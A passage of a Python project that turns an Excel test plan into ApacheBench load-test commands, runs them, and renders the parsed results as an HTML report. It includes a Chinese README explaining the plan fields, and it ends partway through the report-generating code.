# api_address.split("/")[-2]+"_"+api_address.split("/")[-1]+\
# "_"+str(continue_time_seconds)+"t_"+str(threads)+"c.txt"
# # print (cmd_content.replace("\n",""))
# cmd_list.append(cmd_content.replace("\n",""))
# # print(os.popen(cmd_content).read())
# return cmd_list
# def requests_by_sum(sum_requests_times,user_threads,info_level=1,api_address="",output_path=""):
# cmd_content = "ab" + " -n " + str(sum_requests_times) + " -c " + str(user_threads)
# cmd_content = cmd_content + " -v " + str(info_level)
# cmd_content = cmd_content + " " + str(api_address)
# if len(output_path) > 0:
# cmd_content = cmd_content + " > " + str(output_path)+".txt"
# print(cmd_content)
# print(os.popen(cmd_contentent).read())
def get_plan_data():
    """Read every test-plan row from ./TestPlan.xls (sheet "Sheet1").

    Returns a list of rows (header row 0 is skipped); each row is a list
    of cell values converted to strings.  Numeric cells lose the trailing
    ".0" and relative "./" paths are rewritten to absolute paths rooted at
    the project directory.

    NOTE(review): ``.replace(".0", "")`` strips ".0" anywhere in the cell,
    so a value like "10.05" would become "105" — confirm plan cells never
    contain such values.
    """
    workbook = xlrd.open_workbook("./TestPlan.xls")
    table = workbook.sheet_by_name("Sheet1")
    # Hoisted out of the loop: the project root never changes per cell.
    project_root = os.path.abspath(os.path.dirname(os.path.dirname(__file__))) + "/"
    all_date_list = []
    for row in range(1, table.nrows):  # row 0 is the header
        row_date_list = []
        for col in range(0, table.ncols):
            value = str(table.cell(row, col).value)
            value = value.replace(".0", "").replace("./", project_root)
            row_date_list.append(value)
        all_date_list.append(row_date_list)
    return all_date_list
def get_table_start_col():
    """Return the column index of the "测试接口地址" header cell.

    Every other plan column is addressed relative to this index by
    get_cmd_list().  Returns None when the header cannot be found.
    """
    # The original opened the workbook twice and tracked a redundant
    # counter that always equalled ``col``; both removed.
    workbook = xlrd.open_workbook("./TestPlan.xls")
    table = workbook.sheet_by_name("Sheet1")
    for row in range(0, table.nrows):
        for col in range(0, table.ncols):
            if str(table.cell(row, col).value) == "测试接口地址":
                return col
    return None
def get_cmd_list(all_rows_list):
    """Turn test-plan rows into lists of ready-to-run ``ab`` command lines.

    One inner list is produced per plan row, holding one command per
    concurrency level (the '|'-separated "并发数级别" column).  Each
    command redirects its output into a timestamped file under
    ResultFloder/<YYYYMMDD>/.

    NOTE(review): the cool-down seconds (column offset +9) are appended to
    the command string as a literal "sleep<N>" suffix AFTER the ".txt"
    file name; Main.py splits on "sleep" to recover both the real command
    and the wait time — confirm get_report_file_list handles this too.
    """
    cmd_list = []
    # Column offset of "测试接口地址"; other columns are relative to it.
    table_start_col_flag = get_table_start_col()
    for row in all_rows_list:
        concurrency_level = row[table_start_col_flag + 6].split("|")
        row_cmd_list = []
        for concurrency in concurrency_level:
            # Start a fresh command for this concurrency level.
            row_cmd_content = ""
            # -t (duration) or -n (total requests), plus -c concurrency.
            if len(str(row[table_start_col_flag + 5])) < 1:
                row_cmd_content += "ab" + " -t " + str(row[table_start_col_flag + 4]) + " -c " + str(concurrency)
            else:
                row_cmd_content += "ab" + " -n " + str(row[table_start_col_flag + 5]) + " -c " + str(concurrency)
            # -v verbosity level.
            row_cmd_content += " -v " + str(row[table_start_col_flag + 8])
            # -k keep-alive, enabled when the plan cell says "是".
            if len(str(row[table_start_col_flag + 7])) > 0:
                if str(row[table_start_col_flag + 7]).replace(" ", "") == "是":
                    row_cmd_content = row_cmd_content + " -k "
            # -T content-type header.
            if len(str(row[table_start_col_flag + 2])) > 0:
                row_cmd_content += " -T " + str(row[table_start_col_flag + 2])
            # -p POST body file, resolved under <project>/JsonFile/.
            if len(str(row[table_start_col_flag + 1])) > 0:
                row_cmd_content += " -p "
                row_cmd_content += os.path.abspath(os.path.dirname(os.path.dirname(__file__))) + "/JsonFile/"
                row_cmd_content += str(row[table_start_col_flag + 1])
            # -H extra request headers, '|'-separated in the plan.
            if len(str(row[table_start_col_flag + 3])) > 0:
                header_str = ""
                for i in str(row[table_start_col_flag + 3]).split("|"):
                    header_str += " -H " + i
                row_cmd_content += header_str
            # Quoted target URL.
            row_cmd_content += " " + "\"" + str(row[table_start_col_flag + 0]) + "\""
            # Per-day result directory, created on demand.
            result_file_floder_path = os.path.abspath(os.path.dirname(os.path.dirname(__file__))) + "/ResultFloder/" + \
                                      datetime.datetime.strftime(datetime.datetime.now(), '%Y%m%d') + "/"
            if not os.path.exists(result_file_floder_path):
                os.makedirs(result_file_floder_path)
            result_file_name = ""
            # Name the result file after the last two URL path segments
            # (query string stripped first).
            if "?" in str(row[table_start_col_flag + 0]):
                api_adress_last_line = str(row[table_start_col_flag + 0]).split("?")[0]
            else:
                api_adress_last_line = str(row[table_start_col_flag + 0])
            result_file_name += str(api_adress_last_line.split("/")[-2]) + "_"
            result_file_name += str(api_adress_last_line.split("/")[-1]) + "_"
            if " -n " in row_cmd_content:
                result_file_name += str(row[table_start_col_flag + 5]) + "n_" + str(concurrency) + "c"
            else:
                result_file_name += str(row[table_start_col_flag + 4]) + "t_" + str(concurrency) + "c"
            if " -k " in row_cmd_content:
                result_file_name += "_k_"
            else:
                result_file_name += "_"
            result_file_name += datetime.datetime.strftime(datetime.datetime.now(), '%H%M') + ".txt"
            # result_file_name += "2155.txt"
            # "sleep<N>" marker carrying the cool-down seconds (see docstring).
            result_file_name += "sleep" + str(row[table_start_col_flag + 9])
            row_cmd_content = row_cmd_content + " > " + result_file_floder_path + result_file_name
            row_cmd_list.append(row_cmd_content)
        cmd_list.append(row_cmd_list)
    return cmd_list
def exec_cmd(cmd_str):
    """Run a shell command, echoing it first, and return its stdout.

    NOTE(review): cmd_str reaches the shell unescaped; only use with
    trusted input coming from the local test plan.
    """
    print("执行命令:" + cmd_str)
    # Close the pipe deterministically instead of leaking the handle.
    with os.popen(cmd_str) as pipe:
        return pipe.read()
def get_post_data(cmd_str_list):
    """Return the POST body referenced by the ``-p`` option of a command.

    Scans the given ab command strings for "-p <file>" (the original only
    inspected the first command; all commands in a row share the same -p,
    so scanning them all is a compatible generalisation).  The file's
    lines are joined with "</br>" for HTML display.  Returns the literal
    "无post数据" when no command carries a POST body.
    """
    json_file_path = ""
    for cmd in cmd_str_list:
        if "-p " in cmd:
            # The token right after "-p " is the json file path.
            json_file_path = cmd.split("-p ")[1].split(" ")[0]
            break
    if not json_file_path:
        return "无post数据"
    json_line = ""
    # Context manager closes the file (the old loop leaked the handle).
    with open(json_file_path) as json_file:
        for line in json_file:
            json_line += line + "</br>"
    return json_line
# class jmeter:
# def requests(continue_time_seconds,user_threads,api_address):
# cmd_content="jmeter"+\
# " -t "+str(continue_time_seconds)+\
# " -c "+str(user_threads)+\
# " "+api_address
# print (cmd_content)
# print(os.popen(cmd_content).popenread())
# if __name__ == '__main__':
# # 获取 excel 中表格数据
# plan=get_plan_data()
# # 生成测试命令
# cmd_list=get_cmd_list(plan)
# # 执行测试命令
# for cmd in cmd_list:
# print("执行命令:\n"+cmd)
# # os.popen(cmd)
# #生成测试报告
#
#
#
#
#
# # .read())
<file_sep>/Main.py
import Common.Report
import Common.Exceter
import time
def wai_for_time(hours_min):
    """Block until the local wall-clock time (as "HHMM") equals hours_min.

    Polls every 5 seconds.  Returns None once the time matches.
    """
    while True:
        h_m = time.strftime('%H%M', time.localtime())
        if h_m == hours_min:  # plain == instead of h_m.__eq__(...)
            # The original passed '%a' format strings as a second print
            # argument, producing garbled output; use real interpolation.
            print('等待时间%s到了,开始执行...' % hours_min)
            break
        print('等待时间%s未到,继续等待5秒...' % hours_min)
        time.sleep(5)
if __name__ == '__main__':
    # Run the whole plan once; raise the range bound to repeat the plan.
    for i in range(0, 1):
        # wai_for_time("1612")
        repo = Common.Report
        exector = Common.Exceter
        # Read the rows of the Excel test plan.
        plan = exector.get_plan_data()
        # Build the ab command lines, one inner list per plan row.
        cmd_list = exector.get_cmd_list(plan)
        result_file_path_list = []
        html = """"""
        html += repo.generate_report_header(repo.get_current_datetime_str(), len(cmd_list))  # report header
        index = 0
        for row_cmd in cmd_list:
            # Extract this row's POST payload (if any) for the report.
            post_data_str = exector.get_post_data(row_cmd)
            # Cool-down seconds carried in the "sleep" suffix of the command.
            sleep_time = row_cmd[0].split("sleep")[1].replace(" ", "")
            cmd_report_str = """"""
            for cmd in row_cmd:
                # Strip the trailing "sleep" marker before executing.
                cmd = cmd.split("sleep")[0]
                # Run one concurrency level of this API's test.
                exector.exec_cmd(cmd)
                cmd_report_str += cmd.split("sleep")[0] + "</br>\n"
                # Wait between runs so consecutive tests do not interfere.
                if len(sleep_time) > 0:
                    print("等待" + sleep_time + "秒...")
                    time.sleep(int(sleep_time))
            # Collect every result file produced for this API.
            report_file_list = repo.get_report_file_list(row_cmd)
            # Append this API's HTML fragment to the report.
            index += 1
            html += repo.generate_row_html(cmd_report_str, report_file_list, post_data_str, index)
        html += Common.Report.generate_report_footer()
        # Write the final report to disk.
        repo.write_html(html)
        # print(html)
        print('####################')
        print('###第' + str(i+1) + '次测试完成###')
        print('####################')
<file_sep>/readMe.md
# Apache_BenchMark API Test Tool
### 一、前言
- 项目说明:本项目使用Apache_BenchMark(以下简称ab)测试工具,对<font color='red'>**单个**</font>接口进行压测,并输出测试结果。
- 最终效果:在表格中编写单接口压力测试用例,一键执行,逐次对表格内所有接口遍历执行,并输出测试报告。
- ab官网地址:http://httpd.apache.org/docs/2.0/programs/ab.html
### 二、环境
- python环境:python 3.6
- IDE:PyCharm
### 三、安装和使用
#### 1、克隆本项目到本地
```bash
git clone https://github.com/Zekylly/ApacheBenchmarkAPITestTool
```
#### 2、工程目录说明

#### 3、根据自己的接口,填写测试用例表格`TestPlan.xls`
##### 3.1、表格的各字段说明
- **测试接口名称**:填写接口名称,可自定义
- **接口说明**:填写接口名称,可自定义,主要方便标记
- **测试接口地址**:全部地址,包含`协议`、`ip或域名`、`端口号`、`接口`。格式例如:http://www.baidu.com:8080/get/weather
- **Post数据文件地址**:若接口为get请求,该字段为放空。若接口为post接口,则需要传入post数据体,以`.json`形式存储,默认选取路径为`项目/JsonFile/xxxx.json`
```json
{"pageNumber":1,"pageSize": 1,"type":1}
```
- **头文件类型(选填)**:即提交数据方式(enctype 属性),规定在发送到服务器之前应该如何对表单数据进行编码。
| 值 | 描述 |
| --------------------------------- | ------------------------------------------------------------ |
| application/x-www-form-urlencoded | 在发送前编码所有字符(默认) |
| multipart/form-data | 不对字符编码。在使用包含文件上传控件的表单时,必须使用该值。 |
| application/json | 作为请求头告诉服务端**消息主体是序列化的JSON字符串**。除低版本的IE,基本都支持。 |
| text/plain | 空格转换为 “+” 加号,但不对特殊字符编码。 |
- **头文件参数**:token等相关参数填写处。
- **测试时长(秒)**:与**测试次数**二选一,表示多用户并发测试持续时长
- **测试次数(请求总数)**:与**测试时长**二选一,表示多用户并发测试的总次数
- **并发数级别(|隔开)**:设置vu并发数,直接填写并发用户数,例如:10,表示程序将创建10个虚拟用户。若需要测10、20、50、100、1000个并发用户,则只需使用”|“隔开即可,例:10|20|50|100|1000
- **是否保持用户连接(-k,选填,默认否)**:Use HTTP KeepAlive feature。将http请求保持长连接,该配置可能会影响性能结果数据
- **日志级别(1~4,选填,默认为1)**:测试过程中的日志级别。1为默认,最少日志量,4为最高,最多日志量
- **间隔时长(不同并发的间隔时间,单位:秒)**:当有多个并发数级别,或有多个单接口串联测试时,为避免每次的测试互相干扰,设置每次测试完成后,该测试工具将以time.sleep()的方式来等待服务器”降温“。
##### 3.2、get 请求
需保证测试用例表格中”**测试接口地址的**“的准确性,同时”**Post数据文件地址**“字段放空
##### 3.3、post 请求
编写`.json`文件放置目录:`项目/JsonFile/xxxx.json`,其余参考测试用例表格中”**Post数据文件地址**“

#### 4、执行测试
编写完成工程表格用例后,进入工程目录,执行main.py,执行过程中,查看PyCharm的Console输出栏,将输出执行日志。

#### 5、查看结果
打开./ReportFile目录下的测试报告,并使用浏览器打开,即可查看。
##### 5.1整体报告

##### 5.2测试命令及Post数据

##### 5.3关键数据结果

#### 6、注意事项
- 为避免接口报错而无法知晓,编写计划调试时,请先试用日志级别3进行测试,测试完成后,在`./ResultFloder/`目录下找到对应的测试结果,打开查看是否得到了正确的服务器Response。
- 测试报告中所有数据,均取自在工程各目录下各文件
- 尽量使用`.xls`格式文件编写TestPlan
- 该项目当前仅可测单接口,多接口数据参数化串联测试暂未实现
- 本项目依赖于ab工具测试结果,更多知识及参数请参考:
- https://www.drupal.org/docs/develop/profiling-drupal/apache-bench-ab
- https://www.cnblogs.com/gumuzi/p/5617232.html
- http://www.devside.net/wamp-server/load-testing-apache-with-ab-apache-bench
- http://www.it1352.com/708197.html
- https://www.w3ctech.com/topic/1746
<file_sep>/Common/Report.py
# -*- coding: utf-8 -*-
import os
import subprocess
import datetime
import time
from collections import deque
#
def collect_date(report_file_path, last_line=50):
    """Parse the tail of an ApacheBench (ab) result file into a metrics dict.

    Only the last ``last_line`` lines are scanned — ab prints its summary
    at the end of the output.  Every known metric is pre-seeded with the
    sentinel "NOT_GET_DATA" so the report renderer never hits a missing
    key, and the file handle is closed deterministically (the original
    leaked it).

    :param report_file_path: path to a file produced by ``ab ... > file``
    :param last_line: number of trailing lines to scan
    :return: dict mapping metric names to string values
    """
    not_set = "NOT_GET_DATA"
    # Column names of ab's "Connection Times (ms)" table, in printed order.
    timing_cols = ("Min", "Mean", "Sd", "Median", "Max")
    scalar_keys = (
        "Server_Hostname", "Server_Port", "API_Path", "Document_Length",
        "User_Threads", "Test_Time_Taken", "Complete_Requests",
        "Failed_Requests", "Total_Transferred", "Requests_Per_Second",
        "Time_Per_Request_Sum", "Time_Per_Request", "Transfer_Rate",
        "Transfer_Rate_total",
    )
    percentiles = ("50%", "66%", "75%", "80%", "90%", "95%", "98%", "99%", "100%")
    test_result = {key: not_set for key in scalar_keys}
    for row_name in ("Connect", "Processing", "Waiting", "Total"):
        for col_name in timing_cols:
            test_result[row_name + "_" + col_name] = not_set
    for pct in percentiles:
        test_result[pct] = not_set

    # Read only the trailing lines; errors="replace" guards against any
    # non-UTF-8 bytes in the captured output.
    with open(report_file_path, "r", errors="replace") as report_file:
        tail = deque(report_file, last_line)

    for raw_line in tail:
        line = raw_line.rstrip("\n")
        stripped = line.strip()
        if "Server Hostname:" in line:
            test_result["Server_Hostname"] = line.replace("Server Hostname:", "").replace(" ", "")
        elif "Server Port:" in line:
            test_result["Server_Port"] = line.replace("Server Port:", "").replace(" ", "")
        elif "Document Path:" in line:
            test_result["API_Path"] = line.replace("Document Path:", "").replace(" ", "")
        elif "Document Length:" in line:
            test_result["Document_Length"] = line.replace("Document Length:", "").replace(" ", "").replace("bytes", "")
        elif "Concurrency Level:" in line:
            test_result["User_Threads"] = line.replace("Concurrency Level:", "").replace(" ", "")
        elif "Time taken for tests:" in line:
            test_result["Test_Time_Taken"] = line.replace("Time taken for tests:", "").replace("seconds", "").replace(" ", "")
        elif "Complete requests" in line:
            test_result["Complete_Requests"] = line.replace("Complete requests:", "").replace(" ", "")
        elif "Failed requests:" in line:
            test_result["Failed_Requests"] = line.replace("Failed requests:", "").replace(" ", "")
        elif "Total transferred:" in line:
            test_result["Total_Transferred"] = line.replace("Total transferred:", "").replace("bytes", "").replace(" ", "")
        elif "Requests per second:" in line:
            test_result["Requests_Per_Second"] = line.replace("Requests per second:", "").replace("[#/sec] (mean)", "").replace(" ", "")
        elif "Time per request:" in line and "across all concurrent requests)" in line:
            test_result["Time_Per_Request"] = line.replace("Time per request:", "").replace("[ms] (mean, across all concurrent requests)", "").replace(" ", "")
        elif "Time per request:" in line and "(mean)" in line:
            test_result["Time_Per_Request_Sum"] = line.replace("Time per request:", "").replace("[ms] (mean)", "").replace(" ", "")
        elif "Transfer rate:" in line and "received" in line:
            test_result["Transfer_Rate"] = line.replace("Transfer rate:", "").replace("[Kbytes/sec] received", "").replace(" ", "")
        elif "kb/s total" in line:
            test_result["Transfer_Rate_total"] = line.replace("kb/s total", "").replace(" ", "")
        elif stripped.startswith(("Connect:", "Processing:", "Waiting:", "Total:")):
            # One row of the "Connection Times" table, e.g.
            #   Connect:        0    1   0.5      1       3
            # str.split() collapses any whitespace run, unlike the old
            # fixed-width replace() chains which misparsed runs longer
            # than eight spaces.
            parts = stripped.split()
            row_name = parts[0].rstrip(":")
            for col_name, value in zip(timing_cols, parts[1:6]):
                test_result[row_name + "_" + col_name] = value
        else:
            # Percentile table, e.g. "  99%     38" / " 100%  41 (longest request)".
            for pct in percentiles:
                if pct in line:
                    test_result[pct] = line.replace("(longest request)", "").replace(pct, "").replace(" ", "")
                    break
    return test_result
def generate_report_header(test_time, count_api):
    """Return the opening HTML of the report: <head>, the show/hide JS
    helper and the "测试信息" summary block.

    :param test_time: human-readable timestamp shown in the summary
    :param count_api: number of APIs covered by this run
    """
    header_str = """<!--这里是头部内容-->
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport"content="width=device-width,initial-scale=1,maximum-scale=1,minimum-scale=1,user-scalable=no">
<script type="text/javascript">
function showOrHide(divID,textID){
var targetDiv = document.getElementById(divID);
if (targetDiv){
if (targetDiv.style.display=='block'){
var old_content=document.getElementById(textID).innerHTML;
document.getElementById(textID).innerHTML=old_content.replace("隐藏",'查看');
targetDiv.style.display='none';
}else{
var old_content=document.getElementById(textID).innerHTML;
document.getElementById(textID).innerHTML=old_content.replace('查看',"隐藏");
targetDiv.style.display='block';
}
}
}
</script>
<title>测试报告</title>
</head>
<!--这里是测试信息-->
<body>
<div class="box">
<div class="table">
<div class="table-header"><strong>互勾单接口测试报告</strong></div>
<div class="table-box">
<div class="table-header-item">
<div class="table-header-item-title">测试信息</div>
<div class="table-header-list">
<div class="table-header-list-left">测试时间</div>
<div class="table-header-list-right">""" + test_time + """</div>
</div>
<div class="table-header-list">
<div class="table-header-list-left">测试目的</div>
<div class="table-header-list-right">对""" + str(count_api) + """个接口进行并发测试,提取测试数据,作为后续接口调优参考</div>
</div>
<div class="table-header-list">
<div class="table-header-list-left">测试方法</div>
<div class="table-header-list-right">在相同时间内或在相同的总请求数下,并发数逐级递增后,接口的性能状况。</div>
</div>
</div>
<!--这里是需要插入的接口测试结果-->
<div class="table-content">"""
    return header_str + "\n"
def get_current_datetime_str():
    """Current local time formatted as 'YYYY-MM-DD HH:MM:SS'."""
    return datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
def generate_report_footer():
    """Return the closing HTML of the report: reference links, the
    closing tags for the layout opened by generate_report_header(), and
    the embedded stylesheet."""
    footer_str = """
</div>
<!--这里是参考链接-->
<div class="table-header-item table-margin-top-20">
<div class="table-header-item-title">参考链接</div>
<div class="table-header-list-auto">
<label style="word-break:break-all;word-wrap:break-word">
1)<a href="https://www.drupal.org/docs/develop/profiling-drupal/apache-bench-ab" target=_blank>https://www.drupal.org/docs/develop/profiling-drupal/apache-bench-ab</a> </br>
2)<a href="https://www.cnblogs.com/gumuzi/p/5617232.html" target=_blank>https://www.cnblogs.com/gumuzi/p/5617232.html</a> </br>
3)<a href="http://www.devside.net/wamp-server/load-testing-apache-with-ab-apache-bench" target=_blank>http://www.devside.net/wamp-server/load-testing-apache-with-ab-apache-bench</a> </br>
4)<a href="http://www.it1352.com/708197.html" target=_blank>http://www.it1352.com/708197.html</a> </br>
5)<a href="https://www.w3ctech.com/topic/1746" target=_blank>https://www.w3ctech.com/topic/1746</a> </br>
</label>
</div>
</div>
</div>
</div>
</body>
<!--这里是css-->
<style>
html,body{
margin: 0;
padding: 0;
height: 100%;
overflow: hidden;
overflow-y: scroll;
}
.box{
width: 100%;
height: 100%;
display: block;
}
.table{
display: flex;
flex-direction: column;
flex: 1;
margin: 20px;
border:1px solid black;
}
.table .table-header{
height: 50px;
display: flex;
align-items: center;
justify-content: center;
background-color: cornflowerblue;
color: white;
font-size:x-large;
}
.table .table-box{
padding: 15px;
display: flex;
flex-direction: column;
flex: 1;
background-color: gainsboro;
}
.table .table-box .table-header-item{
display: flex;
flex-direction: column;
height: auto;
}
.table-header-item-title {
display: flex;
align-items: center;
justify-content: center;
height: 40px;
width: 120px;
background-color: cornflowerblue;
border:1px solid black;
color:white;
}
.table .table-box .table-header-item .table-header-list {
display: flex;
flex-direction: row;
align-items: center;
height: 40px;
border:1px solid black;
}
.table-header-list-left {
display: flex;
justify-content: center;
align-items: center;
height: 40px;
width: 120px;
border-right:1px double black;
}
.table-header-list-right{
margin-left: 20px;
margin-right: 20px;
flex: 1;
}
.table .table-box .table-content {
margin-top: 15px;
flex: 1px;
}
.table-content-li {
padding-bottom: 15px;
display: block;
width: 100%;
overflow: scroll;
border:1px solid black;
background-color: white;
display:none
}
.table-content-li-header {
padding: 10px 20px 10px 20px;
background-color: cornflowerblue;
display: flex;
justify-content: flex-start;
align-items: center;
border:1px solid black;
border-bottom: white;
color: white;
}
.table-content-item {
margin:0 15px 0 15px;
height: auto;
background-color: #f0f0f0;
font-size:small
}
.table-content-item tr {
text-align: center;
width:fit-content;
}
.table-content-item tr td {
padding: 5px;
}
.table-margin-top-20 {
margin-top: 20px;
}
.table-header-list-auto {
padding: 10px;
display: flex;
flex-direction: row;
align-items: center;
flex-wrap: wrap;
height: auto;
white-space: normal;
border:1px solid black;
}
.table-tr-header {
margin: 15px 15px 0 15px;
padding: 5px 20px 5px 20px;
width: fit-content;
background-color: PowderBlue;
border:1px solid black;
}
.table-tr-foot {
margin: 0px 0px 0 15px;
width: fit-content;
border:1px solid black;
}
</style>
</html>"""
    return footer_str + "\n"
def generate_row_html(cmd_str, result_file_path_list, json_str, index):
index = str(index)
result_dic = collect_date(result_file_path_list[0])
# print(result_file_path_list[0])
# print(result_dic)
# print(result_dic['API_Path'])
if result_dic['API_Path'] == "NOT_GET_DATA":
div_id = "NO_GET_DATA"
else:
div_id = result_dic['API_Path'].split("/")[-2] + "_" + result_dic['API_Path'].split("/")[-1]
api_info = result_dic['Server_Hostname'] + result_dic['API_Path']
test_cmd_list_str = cmd_str
part_one_api_info = """
<!--part_one_api_info-->
<!--这里是接口信息-->
<div id='interface_info' class="table-content-li-header" onclick="showOrHide('""" + div_id + """_""" + index + """','interface_info')">(点击查看)接口信息:""" + api_info + """</div>
<div id=\"""" + div_id + """_""" + index + """\" class="table-content-li" display="none">
<div id='cmd_title' class="table-tr-header" onclick="showOrHide('cmd_""" + div_id + """','cmd_title')">(点击查看)测试命令及Post数据</div>
<div id='cmd_""" + div_id + """' style="display:none">
<table class="table-content-item" border="1" cellspacing="0">
<tbody>
<tr>
<td rowspan=4 colspan=16 align="left">
""" + test_cmd_list_str.replace("/Users/panpan/Desktop/DDStudy/APItest/",
"./") + """
</td>
</tr>
<tr></tr><tr></tr><tr></tr>
<tr>
<td rowspan=4 colspan=16 align="left">
POST 参数数据 :""" + json_str + """
</td>
</tr>
</tbody>
</table>
</div>
"""
key_result_title = """
<!--key_result_title-->
<!--这里是关键数据结果-->
<div class="table-tr-header">关键数据结果</div>
<table class="table-content-item" border="1" cellspacing="0">
<tr>
<td> </td>
<td>总请求数</td>
<td>失败数量</td>
<td>测试时长</td>
<td style="background-color:LightSteelBlue">Requests per second</td>
<td style="background-color:LightSteelBlue">Time per request1</td>
<td>Time per request2</td>
<td>Document Length</td>
<td>Total transferred</td>
<td>Transfer rate(total)</td>
</tr>
"""
key_result_value = """"""
for file_path in result_file_path_list:
test_result = collect_date(file_path) # return dic
table_title = test_result['Test_Time_Taken'].split(".")[0] + """秒""" + test_result['User_Threads'] + """并发"""
if "ab -n" in cmd_str:
table_title = test_result['Complete_Requests'].split(".")[0] + """次""" + test_result[
'User_Threads'] + """并发"""
key_result_value += """
<!--key_result_value-->
<tr>
<td>""" + table_title + """</td>
<td>""" + test_result['Complete_Requests'] + """个</td>
<td>""" + test_result['Failed_Requests'] + """个</td>
<td>""" + test_result['Test_Time_Taken'] + """秒</td>
<td style="background-color:LightSteelBlue">""" + test_result['Requests_Per_Second'] + """个请求/每秒</td>
<td style="background-color:LightSteelBlue">""" + test_result['Time_Per_Request_Sum'] + """毫秒</td>
<td>""" + test_result['Time_Per_Request'] + """毫秒</td>
<td>""" + test_result['Document_Length'] + """ bytes</td>
<td>""" + test_result['Total_Transferred'] + """ bytes/秒</td>
<td>""" + test_result['Transfer_Rate'] + """ bytes/秒</td>
</tr>
"""
key_result_memo = """
<!--key_result_memo-->
<tr>
<td colspan=10 align="left">
1、Document Length:服务器处理请求后返回的响应数据长度</br>
2、Requests per second(RPS):RPS,即服务器每秒处理的请求数量</br>
3、Time per request1:</br>
a、从用户角度看,完成一个请求所需要的时间</br>
b、体现1个连接(含多个请求)耗费的总时长,当于1个用户同时发送个多个并发请求给服务器并发处理后,得到这多个请求的响应数据的总时长</br>
4、Time per request2:
a、服务器完成一个请求的时间。</br>
b、体现1个连接多个请求中平均每一次请求的耗费时长,Time per request2=Time per request1/当前并发数。</br>
5、Transfer rate:网络传输速率,即平均每秒网络传输的数据量。该项有三个子项,received、sent、total(目前仅记录total)</br></td>
</tr>
</table>
"""
response_pct_title = """
<!--response_pct_title-->
<!--这里是响应时间百分比分布-->
<div class="table-tr-header">响应时间百分比分布</div>
<table class="table-content-item" border="1" cellspacing="0">
<tr>
<td> </td>
<td>Average</td>
<td>Min</td>
<td>50%</td>
<td>75%</td>
<td>80%</td>
<td style="background-color:LightSteelBlue">90%</td>
<td>95%</td>
<td>99%</td>
<td>Max</td>
</tr>
"""
response_pct_value = """"""
for file_path in result_file_path_list:
test_result = collect_date(file_path) # return dic
table_title = test_result['Test_Time_Taken'].split(".")[0] + """秒""" + test_result['User_Threads'] + """并发"""
if "ab -n" in cmd_str:
table_title = test_result['Complete_Requests'].split(".")[0] + """次""" + test_result[
'User_Threads'] + """并发"""
test_result = collect_date(file_path) # return dic
response_pct_value += """
<!--response_pct_value-->
<tr>
<td>""" + table_title + """</td>
<td>""" + test_result['Total_Mean'] + """毫秒</td>
<td>""" + test_result['Total_Min'] + """毫秒</td>
<td>""" + test_result['50%'] + """毫秒</td>
<td>""" + test_result['75%'] + """毫秒</td>
<td>""" + test_result['80%'] + """毫秒</td>
<td style="background-color:LightSteelBlue">""" + test_result['90%'] + """毫秒</td>
<td>""" + test_result['95%'] + """毫秒</td>
<td>""" + test_result['99%'] + """毫秒</td>
<td>""" + test_result['100%'] + """毫秒</td>
</tr>
"""
response_pct_memo = """
<!--response_pct_memo-->
<tr>
<td colspan=17 align="left">
1、一般较为关注90%的用户的响应时长,表示90%用户的请求所等待的时间不会超过的时间</br>
2、例如:当前接口中,90%的用户最长的等待时间不会超过""" + test_result['90%'] + """毫秒</br>
3、将所有请求的响应时间从小到大排序后,取列表中前百分比的所有请求时间,并取最大值。</br>
</td>
</tr>
</table>
"""
connect_time_title = """
<!--connect_time_title-->
<!--这里是响应时间分解表-->
<div class="table-tr-header">响应时间分解表</div>
<table class="table-content-item" border="1" cellspacing="0">
<tr>
<td rowspan=2> </td>
<td colspan=5>Connect</td>
<td colspan=5>Processing</td>
<td colspan=5>Waiting</td>
<td colspan=5 style="background-color:LightSteelBlue">Total</td>
</tr>
<tr>
<td>min</td>
<td>mean</td>
<td>+/-sd</td>
<td>median</td>
<td>max</td>
<td>min</td>
<td>mean</td>
<td>+/-sd</td>
<td>median</td>
<td>max</td>
<td>min</td>
<td>mean</td>
<td>+/-sd</td>
<td>median</td>
<td>max</td>
<td style="background-color:LightSteelBlue">min</td>
<td style="background-color:LightSteelBlue">mean</td>
<td style="background-color:LightSteelBlue">+/-sd</td>
<td style="background-color:LightSteelBlue">median</td>
<td style="background-color:LightSteelBlue">max</td>
</tr>
"""
connect_time_value = """"""
for file_path in result_file_path_list:
test_result = collect_date(file_path) # return dic
table_title = test_result['Test_Time_Taken'].split(".")[0] + """秒""" + test_result['User_Threads'] + """并发"""
if "ab -n" in cmd_str:
table_title = test_result['Complete_Requests'].split(".")[0] + """次""" + test_result[
'User_Threads'] + """并发"""
test_result = collect_date(file_path) # return dic
connect_time_value += """
<!--connect_time_value-->
<tr>
<td>""" + table_title + """</td>
<td>""" + test_result['Connect_Min'] + """毫秒</td>
<td>""" + test_result['Connect_Mean'] + """毫秒</td>
<td>""" + test_result['Connect_Sd'] + """毫秒</td>
<td>""" + test_result['Connect_Median'] + """毫秒</td>
<td>""" + test_result['Connect_Max'] + """毫秒</td>
<td>""" + test_result['Processing_Min'] + """毫秒</td>
<td>""" + test_result['Processing_Mean'] + """毫秒</td>
<td>""" + test_result['Processing_Sd'] + """毫秒</td>
<td>""" + test_result['Processing_Median'] + """毫秒</td>
<td>""" + test_result['Processing_Max'] + """毫秒</td>
<td>""" + test_result['Waiting_Min'] + """毫秒</td>
<td>""" + test_result['Waiting_Mean'] + """毫秒</td>
<td>""" + test_result['Waiting_Sd'] + """毫秒</td>
<td>""" + test_result['Waiting_Median'] + """毫秒</td>
<td>""" + test_result['Waiting_Max'] + """毫秒</td>
<td style="background-color:LightSteelBlue">""" + test_result['Total_Min'] + """毫秒</td>
<td style="background-color:LightSteelBlue">""" + test_result['Total_Mean'] + """毫秒</td>
<td style="background-color:LightSteelBlue">""" + test_result['Total_Sd'] + """毫秒</td>
<td style="background-color:LightSteelBlue">""" + test_result['Total_Median'] + """毫秒</td>
<td style="background-color:LightSteelBlue">""" + test_result['Total_Max'] + """毫秒</td>
</tr>
"""
connect_time_memo = """
<tr>
<td colspan=21 align="left">
1、Connect:表示网络延时加上与远程服务器建立连接所耗费的时间</br>
2、Processing:表示第一个字节发出去至接受到第一个响应字节之间所耗费的时间, 这里大致可以推断出服务器的处理能力。</br>
3、Waiting:表示最后一个字节发送完至接受到第一个字节到响应时间间隔。</br>
4、Total:表示从建立连接开始至接受到第一个字节响应的总时间。</br>
5、mean:平均值。即一个页请求平均花费了多长时间。</br>
6、[+/-sd]:标准偏差。描述结果数据的波动大小。</br>
